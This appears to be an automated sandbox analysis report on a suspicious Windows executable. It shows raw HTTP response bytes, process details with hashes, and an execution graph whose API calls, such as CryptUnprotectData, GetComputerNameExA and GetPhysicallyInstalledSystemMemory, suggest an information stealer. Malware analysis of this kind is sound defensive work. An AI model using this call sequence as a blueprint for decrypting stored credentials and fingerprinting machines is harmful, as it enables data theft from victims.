                                                                                                                                                              2024-12-24 10:22:41 UTC1024INData Raw: 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5 cf fb d0 f1 3b 9e a0 da 47 87 50 21 1b 80 74 df 40 4a ce cc
                                                                                                                                                              Data Ascii: |Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S;GP!t@J
                                                                                                                                                              2024-12-24 10:22:41 UTC9592INData Raw: f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69 6c 0e f0 1e 6d f3 65 43 97 63 00 ac 8c 80 95 09 d0 c5 1f 88
                                                                                                                                                              Data Ascii: zRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e6N<DilmeCc


                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:05:22:10
                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\fnCae9FQhg.exe"
                                                                                                                                                              Imagebase:0x9c0000
                                                                                                                                                              File size:2'960'384 bytes
                                                                                                                                                              MD5 hash:F52F8EC2CDDC2977F7F74FCFDF87D35F
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:05:22:43
                                                                                                                                                              Start date:24/12/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028
                                                                                                                                                              Imagebase:0x250000
                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Disassembly

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:67%
                                                                                                                                                                Total number of Nodes:476
                                                                                                                                                                Total number of Limit Nodes:44
                                                                                                                                                                execution_graph 14546 a00d20 14547 a00d2f 14546->14547 14550 a00e98 14547->14550 14554 9fe110 LdrInitializeThunk 14547->14554 14548 a0114b 14550->14548 14553 a0108e 14550->14553 14555 9fe110 LdrInitializeThunk 14550->14555 14556 9fc570 14553->14556 14554->14550 14555->14553 14557 9fc585 14556->14557 14558 9fc583 14556->14558 14559 9fc58a RtlFreeHeap 14557->14559 14558->14548 14559->14548 14560 9c9d1e 14561 9c9d40 14560->14561 14561->14561 14562 9c9d94 LoadLibraryExW 14561->14562 14563 9c9da5 14562->14563 14564 9c9e74 LoadLibraryExW 14563->14564 14565 9c9e85 14564->14565 14648 9ccbdf 14649 9ccbe7 14648->14649 14652 9d2750 14649->14652 14651 9ccbf4 14662 9d2769 14652->14662 14653 9d2770 14653->14651 14655 9d2d48 RtlExpandEnvironmentStrings 14655->14662 14656 9d4301 CreateThread 14656->14662 14657 9d2fde RtlExpandEnvironmentStrings 14657->14662 14658 9fc570 RtlFreeHeap 14658->14662 14660 9fe110 LdrInitializeThunk 14660->14662 14662->14653 14662->14655 14662->14656 14662->14657 14662->14658 14662->14660 14663 9cb100 14662->14663 14667 a01160 14662->14667 14671 a018a0 14662->14671 14664 9cb190 14663->14664 14664->14664 14666 9cb1b5 14664->14666 14677 9fe0a0 14664->14677 14666->14662 14669 a01180 14667->14669 14668 a012be 14668->14662 14669->14668 14684 9fe110 LdrInitializeThunk 14669->14684 14672 a018d0 14671->14672 14675 a0191e 14672->14675 14685 9fe110 LdrInitializeThunk 14672->14685 14673 a019be 14673->14662 14675->14673 14686 9fe110 LdrInitializeThunk 14675->14686 14678 9fe0c0 14677->14678 14679 9fe0f3 14677->14679 14681 9fe0d4 14677->14681 14682 9fe0e8 14677->14682 14678->14679 14678->14681 14680 9fc570 RtlFreeHeap 14679->14680 14680->14682 14683 9fe0d9 RtlReAllocateHeap 14681->14683 14682->14664 14683->14682 14684->14668 14685->14675 14686->14673 14687 9fc55c RtlAllocateHeap 14688 9d58d5 14723 a01320 14688->14723 14690 9d58ed 14691 9d590f 14690->14691 14692 9d5cad 14690->14692 14695 9d593f 14690->14695 14701 9d5b7e 14690->14701 14711 9d594e 14690->14711 14731 a01650 14690->14731 14691->14692 14691->14695 14691->14701 14691->14711 14735 a01720 14691->14735 14696 a01650 LdrInitializeThunk 14692->14696 14692->14711 14719 9d5cf7 14692->14719 14695->14692 14697 9d6797 14695->14697 14695->14701 14695->14711 14696->14719 14786 9fe110 LdrInitializeThunk 14697->14786 14698 9d60df 14700 a01720 LdrInitializeThunk 14700->14719 14701->14701 14702 a01320 LdrInitializeThunk 14701->14702 14702->14692 14703 9d6319 14754 9d9ad0 14703->14754 14708 9d65bd 14710 9dc8a0 3 API calls 14708->14710 14709 9d60b5 CryptUnprotectData 14709->14698 14712 9d60f1 14709->14712 14709->14719 14710->14711 14712->14703 14721 9d634d 14712->14721 14742 9dc8a0 14712->14742 14715 9d731b 14716 9d66be 14720 9d6792 14716->14720 14787 9fe110 LdrInitializeThunk 14716->14787 14718 9d68eb 14789 9fe110 LdrInitializeThunk 14718->14789 14719->14698 14719->14700 14719->14709 14719->14712 14741 9fe110 LdrInitializeThunk 14719->14741 14720->14718 14788 9fe110 LdrInitializeThunk 14720->14788 14721->14708 14721->14711 14727 a014b0 14721->14727 14725 a01340 14723->14725 14724 a0145e 14724->14690 14725->14724 14790 9fe110 LdrInitializeThunk 14725->14790 14728 a014d0 14727->14728 14729 a015fe 14728->14729 14791 9fe110 LdrInitializeThunk 14728->14791 14729->14721 14733 a01680 14731->14733 14732 a016ce 14732->14691 14733->14732 14792 9fe110 LdrInitializeThunk 14733->14792 14737 a01750 14735->14737 14736 a0184e 14736->14695 14739 a017a9 14737->14739 14793 9fe110 LdrInitializeThunk 14737->14793 14739->14736 14794 9fe110 LdrInitializeThunk 14739->14794 14741->14719 14743 9dc8ca 14742->14743 14743->14743 14795 9d4ca0 14743->14795 14745 9dc9cb 14746 9d4ca0 3 API calls 14745->14746 14747 9dca59 14746->14747 14748 9d4ca0 3 API calls 14747->14748 14749 9dcadf 14748->14749 14750 9d4ca0 3 API calls 14749->14750 14751 9dcbf9 14750->14751 14752 9d4ca0 3 API calls 14751->14752 14753 9dcc62 14752->14753 14753->14703 14755 9d9b00 14754->14755 14759 9d9b78 14755->14759 14889 9fe110 LdrInitializeThunk 14755->14889 14757 9d9cbe 14762 9d9d6e 14757->14762 14779 9d6338 14757->14779 14891 9fe110 LdrInitializeThunk 14757->14891 14759->14757 14890 9fe110 LdrInitializeThunk 14759->14890 14761 9d9eef 14763 9fc570 RtlFreeHeap 14761->14763 14762->14761 14770 9d9f48 14762->14770 14892 9fe110 LdrInitializeThunk 14762->14892 14763->14770 14765 9da2a7 FreeLibrary 14769 9da157 14765->14769 14767 9da152 14767->14765 14768 9da216 FreeLibrary 14767->14768 14772 9da230 14768->14772 14769->14779 14894 9fe110 LdrInitializeThunk 14769->14894 14770->14765 14770->14767 14770->14769 14770->14779 14893 9fe110 LdrInitializeThunk 14770->14893 14774 9da2a2 14772->14774 14895 9fe110 LdrInitializeThunk 14772->14895 14776 9da3fe 14774->14776 14896 9fe110 LdrInitializeThunk 14774->14896 14776->14779 14785 9da4de 14776->14785 14897 9fe110 LdrInitializeThunk 14776->14897 14777 9dac58 14778 9fc570 RtlFreeHeap 14777->14778 14778->14779 14779->14716 14779->14721 14781 9fc830 LdrInitializeThunk 14781->14785 14782 9fc990 LdrInitializeThunk 14782->14785 14783 9fe110 LdrInitializeThunk 14783->14785 14784 9fc570 RtlFreeHeap 14784->14785 14785->14777 14785->14781 14785->14782 14785->14783 14785->14784 14786->14716 14787->14720 14788->14718 14789->14715 14790->14724 14791->14729 14792->14732 14793->14739 14794->14736 14796 9d4cc0 14795->14796 14797 a01320 LdrInitializeThunk 14796->14797 14798 9d4e14 14797->14798 14799 a01320 LdrInitializeThunk 14798->14799 14828 9d5021 14799->14828 14800 9d50e9 14804 9fc570 RtlFreeHeap 14800->14804 14801 9d509e 14801->14800 14802 9d522e 14801->14802 14832 9d5170 14801->14832 14802->14745 14808 9d50ef 14804->14808 14805 9d5551 14854 9fe110 LdrInitializeThunk 14805->14854 14807 9d5152 14809 9d56a1 14807->14809 14810 9d563c 14807->14810 14811 9d57b0 14807->14811 14812 9d5625 14807->14812 14813 9d579e 14807->14813 14814 9d55d3 14807->14814 14815 9d56d2 14807->14815 14831 9d5696 14807->14831 14833 9d55ff 14807->14833 14855 9fc5a0 14807->14855 14808->14807 14875 9fe110 LdrInitializeThunk 14808->14875 14809->14810 14809->14815 14822 a01650 LdrInitializeThunk 14809->14822 14809->14831 14809->14833 14821 a01720 LdrInitializeThunk 14810->14821 14810->14831 14810->14833 14818 9fc990 LdrInitializeThunk 14811->14818 14820 a01320 LdrInitializeThunk 14812->14820 14877 9fc990 14813->14877 14814->14809 14814->14810 14814->14811 14814->14812 14814->14813 14814->14815 14814->14831 14814->14833 14867 9fca40 14814->14867 14823 a01650 LdrInitializeThunk 14815->14823 14825 9d57b9 14818->14825 14820->14810 14821->14810 14822->14815 14823->14810 14825->14825 14828->14800 14828->14801 14828->14832 14836 9fe110 LdrInitializeThunk 14828->14836 14831->14833 14876 9fe110 LdrInitializeThunk 14831->14876 14832->14802 14832->14805 14835 9fe110 LdrInitializeThunk 14832->14835 14837 9f9d30 14832->14837 14833->14745 14835->14832 14836->14801 14839 9f9d40 14837->14839 14838 9fe0a0 2 API calls 14838->14839 14839->14838 14842 9f9e53 14839->14842 14881 9fe110 LdrInitializeThunk 14839->14881 14840 9fa25b 14843 9fc570 RtlFreeHeap 14840->14843 14842->14840 14844 9fc830 LdrInitializeThunk 14842->14844 14845 9fa274 14843->14845 14850 9f9e9a 14844->14850 14845->14832 14846 9fa25f 14847 9fc990 LdrInitializeThunk 14846->14847 14847->14840 14848 9fe0a0 2 API calls 14848->14850 14849 9fc570 RtlFreeHeap 14849->14850 14850->14846 14850->14848 14850->14849 14851 9fa281 14850->14851 14853 9fe110 LdrInitializeThunk 14850->14853 14852 9fc570 RtlFreeHeap 14851->14852 14852->14846 14853->14850 14854->14808 14856 9fc5d0 14855->14856 14857 9fc62e 14856->14857 14882 9fe110 LdrInitializeThunk 14856->14882 14860 9d55c7 14857->14860 14862 9fc749 14857->14862 14883 9fe110 LdrInitializeThunk 14857->14883 14859 9fc570 RtlFreeHeap 14859->14860 14863 9fc830 14860->14863 14862->14859 14864 9fc8fe 14863->14864 14865 9fc841 14863->14865 14864->14814 14865->14864 14884 9fe110 LdrInitializeThunk 14865->14884 14868 9d55f1 14867->14868 14869 9fca5a 14867->14869 14868->14809 14868->14810 14868->14811 14868->14812 14868->14813 14868->14815 14868->14831 14868->14833 14869->14868 14872 9fcae2 14869->14872 14885 9fe110 LdrInitializeThunk 14869->14885 14870 9fcc4e 14870->14868 14870->14870 14887 9fe110 LdrInitializeThunk 14870->14887 14872->14870 14886 9fe110 LdrInitializeThunk 14872->14886 14875->14807 14876->14813 14878 9fca0e 14877->14878 14879 9fc99a 14877->14879 14878->14811 14879->14878 14888 9fe110 LdrInitializeThunk 14879->14888 14881->14839 14882->14857 14883->14862 14884->14864 14885->14872 14886->14870 14887->14868 14888->14878 14889->14759 14890->14757 14891->14762 14892->14761 14893->14767 14894->14779 14895->14774 14896->14776 14897->14785 14571 9ed893 14572 9ed896 FreeLibrary 14571->14572 14573 9edbc9 14572->14573 14573->14573 14574 9edc30 GetComputerNameExA 14573->14574 14898 9cef53 14899 9cef5d CoInitializeEx 14898->14899 14900 9ed34a 14901 9ed370 14900->14901 14902 9ed3ea GetPhysicallyInstalledSystemMemory 14901->14902 14903 9ed410 14902->14903 14903->14903 14575 9feb88 14576 9feba0 14575->14576 14579 9febde 14576->14579 14582 9fe110 LdrInitializeThunk 14576->14582 14577 9fec4e 14579->14577 14581 9fe110 LdrInitializeThunk 14579->14581 14581->14577 14582->14579 14904 9cce45 14905 9cce4b 14904->14905 14906 9cce55 CoUninitialize 14905->14906 14907 9cce80 14906->14907 14583 9ce687 14584 9ce6a0 14583->14584 14589 9f9280 14584->14589 14586 9ce77a 14587 9f9280 5 API calls 14586->14587 14588 9ce908 14587->14588 14588->14588 14591 9f92b0 14589->14591 14590 9f98eb 14592 9f9916 GetVolumeInformationW 14590->14592 14591->14590 14591->14591 14593 9f954f SysAllocString 14591->14593 14596 9f9934 14592->14596 14594 9f9574 14593->14594 14594->14590 14595 9f957c CoSetProxyBlanket 14594->14595 14595->14590 14598 9f959c 14595->14598 14596->14586 14597 9f98d6 SysFreeString SysFreeString 14597->14590 14598->14597 14599 9c8600 14603 9c860f 14599->14603 14600 9c8a48 14601 9c8a31 14608 9fe080 14601->14608 14603->14600 14603->14601 14605 9cb7b0 FreeLibrary 14603->14605 14606 9cb7cc 14605->14606 14607 9cb7d1 FreeLibrary 14606->14607 14607->14601 14611 9ff970 14608->14611 14610 9fe085 FreeLibrary 14610->14600 14612 9ff979 14611->14612 14612->14610 14908 9ccc7a 14909 9ccc86 14908->14909 14938 9e3b50 14909->14938 14911 9ccc8c 14950 9e42d0 14911->14950 14913 9ccca8 14961 9e4560 14913->14961 14915 9cccc4 14972 9e7440 14915->14972 14919 9cccef 14990 9e9e80 14919->14990 14921 9cccf8 14994 9e90d0 14921->14994 14923 9ccd14 14924 9e3b50 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14923->14924 14925 9ccd52 14924->14925 14926 9e42d0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14925->14926 14927 9ccd6e 14926->14927 14928 9e4560 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 14927->14928 14929 9ccd8a 14928->14929 14930 9e7440 RtlFreeHeap LdrInitializeThunk 14929->14930 14931 9ccdac 14930->14931 14932 9e7740 RtlFreeHeap LdrInitializeThunk 14931->14932 14933 9ccdb5 14932->14933 14934 9e9e80 RtlExpandEnvironmentStrings 14933->14934 14935 9ccdbe 14934->14935 14936 9e90d0 RtlExpandEnvironmentStrings 14935->14936 14937 9ccdda 14936->14937 14939 9e3be0 14938->14939 14939->14939 14940 9e3c0e RtlExpandEnvironmentStrings 14939->14940 14941 9e3c50 14940->14941 14943 9e3f58 14941->14943 14944 9e3c9e RtlExpandEnvironmentStrings 14941->14944 14945 9e3ce2 14941->14945 14946 9e3def 14941->14946 14949 9e3cc3 14941->14949 14943->14949 14998 9e1d00 14943->14998 14944->14943 14944->14945 14944->14946 14944->14949 14945->14945 14947 a014b0 LdrInitializeThunk 14945->14947 14946->14943 14946->14946 14948 a014b0 LdrInitializeThunk 14946->14948 14946->14949 14947->14946 14948->14943 14949->14911 14949->14949 14951 9e4360 14950->14951 14951->14951 14952 9e4376 RtlExpandEnvironmentStrings 14951->14952 14954 9e43d0 14952->14954 14955 9e46e1 14954->14955 14957 9e4431 RtlExpandEnvironmentStrings 14954->14957 14960 9e4450 14954->14960 15014 a006f0 14954->15014 15022 a00460 14955->15022 14957->14954 14957->14955 14957->14960 14960->14913 14960->14960 14962 9e456e 14961->14962 14963 a00340 LdrInitializeThunk 14962->14963 14965 9e4408 14963->14965 14964 a006f0 2 API calls 14964->14965 14965->14964 14966 9e46e1 14965->14966 14969 9e4431 RtlExpandEnvironmentStrings 14965->14969 14971 9e4450 14965->14971 14967 a00460 2 API calls 14966->14967 14968 9e4712 14967->14968 14970 a00340 LdrInitializeThunk 14968->14970 14968->14971 14969->14965 14969->14966 14969->14971 14970->14971 14971->14915 14973 9e7460 14972->14973 14975 9e74ae 14973->14975 15039 9fe110 LdrInitializeThunk 14973->15039 14975->14975 14977 9ccce6 14975->14977 14979 9e756e 14975->14979 15040 9fe110 LdrInitializeThunk 14975->15040 14976 9fc570 RtlFreeHeap 14976->14977 14980 9e7740 14977->14980 14979->14976 14979->14979 15041 9e7760 14980->15041 14982 9e7754 14982->14919 14985 9e8080 14985->14919 14986 a01320 LdrInitializeThunk 14989 9e804c 14986->14989 14987 a01650 LdrInitializeThunk 14987->14989 14988 a01720 LdrInitializeThunk 14988->14989 14989->14985 14989->14986 14989->14987 14989->14988 14991 9e9f10 14990->14991 14991->14991 14992 9e9f37 RtlExpandEnvironmentStrings 14991->14992 14993 9e9dd1 14992->14993 14993->14921 14993->14993 14995 9e9110 14994->14995 14995->14995 14996 9e9136 RtlExpandEnvironmentStrings 14995->14996 14997 9e9180 14996->14997 14997->14997 14999 a01320 LdrInitializeThunk 14998->14999 15003 9e1d43 14999->15003 15000 9e23f5 15000->14949 15002 9fc570 RtlFreeHeap 15004 9e239e 15002->15004 15003->15000 15010 9e1de9 15003->15010 15011 9fe110 LdrInitializeThunk 15003->15011 15004->15000 15013 9fe110 LdrInitializeThunk 15004->15013 15006 9e2383 15006->15002 15007 9e245a 15006->15007 15009 9fc570 RtlFreeHeap 15009->15010 15010->15006 15010->15009 15012 9fe110 LdrInitializeThunk 15010->15012 15011->15003 15012->15010 15013->15004 15015 a00710 15014->15015 15018 a0075e 15015->15018 15034 9fe110 LdrInitializeThunk 15015->15034 15016 a009d3 15016->14954 15018->15016 15021 a0084e 15018->15021 15035 9fe110 LdrInitializeThunk 15018->15035 15019 9fc570 RtlFreeHeap 15019->15016 15021->15019 15023 a00480 15022->15023 15024 a004ce 15023->15024 15036 9fe110 LdrInitializeThunk 15023->15036 15027 9e4712 15024->15027 15029 a005af 15024->15029 15037 9fe110 LdrInitializeThunk 15024->15037 15026 9fc570 RtlFreeHeap 15026->15027 15027->14960 15030 a00340 15027->15030 15029->15026 15031 a00360 15030->15031 15031->15031 15032 a0042f 15031->15032 15038 9fe110 LdrInitializeThunk 15031->15038 15032->14960 15034->15018 15035->15021 15036->15024 15037->15029 15038->15032 15039->14975 15040->14979 15042 9e77a0 15041->15042 15042->15042 15043 9fc5a0 2 API calls 15042->15043 15044 9e7817 15043->15044 15045 9fc830 LdrInitializeThunk 15044->15045 15050 9e7823 15045->15050 15046 9e782f 15047 9fc990 LdrInitializeThunk 15046->15047 15048 9e7749 15047->15048 15048->14982 15051 9fa2a0 15048->15051 15050->15046 15058 9fcdf0 15050->15058 15056 9fa2d0 15051->15056 15052 a00340 LdrInitializeThunk 15052->15056 15053 a006f0 2 API calls 15053->15056 15054 9fa428 15054->14989 15056->15052 15056->15053 15056->15054 15068 a00d20 15056->15068 15076 9fe110 LdrInitializeThunk 15056->15076 15060 9fce40 15058->15060 15059 9fd60e 15059->15050 15065 9fce9e 15060->15065 15066 9fe110 LdrInitializeThunk 15060->15066 15062 9fd59a 15062->15059 15067 9fe110 LdrInitializeThunk 15062->15067 15064 9fe110 LdrInitializeThunk 15064->15065 15065->15059 15065->15062 15065->15064 15066->15065 15067->15059 15069 a00d2f 15068->15069 15072 a00e98 15069->15072 15077 9fe110 LdrInitializeThunk 15069->15077 15070 a0114b 15070->15056 15072->15070 15075 a0108e 15072->15075 15078 9fe110 LdrInitializeThunk 15072->15078 15073 9fc570 RtlFreeHeap 15073->15070 15075->15073 15076->15056 15077->15072 15078->15075 15079 9edc76 15080 9edc7c GetComputerNameExA 15079->15080 14613 9c9eb7 14616 9ffe00 14613->14616 14615 9c9ec7 WSAStartup 14617 9ffe20 14616->14617 14617->14615 14617->14617 15082 9cec77 15083 9cec8f CoInitializeSecurity 15082->15083 15084 9e18f0 15085 9e18fe 15084->15085 15088 9e1950 15084->15088 15090 9e1a10 15085->15090 15087 9e19cc 15087->15088 15089 9dfcf0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 15087->15089 15089->15088 15091 9e1a20 15090->15091 15091->15091 15092 a014b0 LdrInitializeThunk 15091->15092 15093 9e1b0f 15092->15093 15094 9cde73 15096 9cded0 15094->15096 15095 9cdf1e 15096->15095 15098 9fe110 LdrInitializeThunk 15096->15098 15098->15095 15099 9e2e6d 15100 9e2e84 15099->15100 15116 9e2ef7 15099->15116 15105 9e2ef2 15100->15105 15123 9fe110 LdrInitializeThunk 15100->15123 15102 9e35ab LoadLibraryW 15104 9e34eb 15102->15104 15110 9e373a 15102->15110 15112 9e364d 15102->15112 15113 9e3670 15102->15113 15103 9e3ab4 RtlExpandEnvironmentStrings 15107 9e3c50 15103->15107 15104->15102 15104->15110 15104->15112 15104->15113 15105->15104 15108 9e3a8f 15105->15108 15105->15116 15111 9e3c9e RtlExpandEnvironmentStrings 15107->15111 15115 9e3def 15107->15115 15107->15116 15117 9e3f58 15107->15117 15120 9e3ce2 15107->15120 15125 9fe110 LdrInitializeThunk 15108->15125 15110->15103 15110->15107 15110->15116 15110->15120 15124 9fe110 LdrInitializeThunk 15110->15124 15111->15115 15111->15116 15111->15117 15111->15120 15113->15112 15126 9fe110 LdrInitializeThunk 15113->15126 15115->15116 15115->15117 15122 a014b0 LdrInitializeThunk 15115->15122 15117->15116 15119 9e1d00 2 API calls 15117->15119 15119->15116 15120->15120 15121 a014b0 LdrInitializeThunk 15120->15121 15121->15115 15122->15117 15123->15105 15124->15110 15125->15103 15126->15112 14618 9f0b2b CoSetProxyBlanket 15128 9ec9eb 15131 9ec8e2 15128->15131 15129 9ecab5 15131->15129 15132 9fe110 LdrInitializeThunk 15131->15132 15132->15131 14619 9fea29 14620 9fea50 14619->14620 14622 9fea8e 14620->14622 14626 9fe110 LdrInitializeThunk 14620->14626 14625 9fe110 LdrInitializeThunk 14622->14625 14624 9feb59 14625->14624 14626->14622 15133 9fe967 15134 9fe980 15133->15134 15134->15134 15137 9fe110 LdrInitializeThunk 15134->15137 15136 9fe9ef 15137->15136 14627 9fc5a0 14628 9fc5d0 14627->14628 14629 9fc62e 14628->14629 14635 9fe110 LdrInitializeThunk 14628->14635 14632 9fc801 14629->14632 14634 9fc749 14629->14634 14636 9fe110 LdrInitializeThunk 14629->14636 14631 9fc570 RtlFreeHeap 14631->14632 14634->14631 14635->14629 14636->14634 14637 9f8ea0 14638 9f8ec5 14637->14638 14641 9f8fc9 14638->14641 14646 9fe110 LdrInitializeThunk 14638->14646 14640 9f9210 14641->14640 14643 9f90e1 14641->14643 14645 9fe110 LdrInitializeThunk 14641->14645 14643->14640 14647 9fe110 LdrInitializeThunk 14643->14647 14645->14641 14646->14638 14647->14643 15138 9fe760 15140 9fe780 15138->15140 15139 9fe7be 15140->15139 15142 9fe110 LdrInitializeThunk 15140->15142 15142->15139

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 009D2750 Relevance: 268.0, APIs: 3, Strings: 149, Instructions: 2041COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
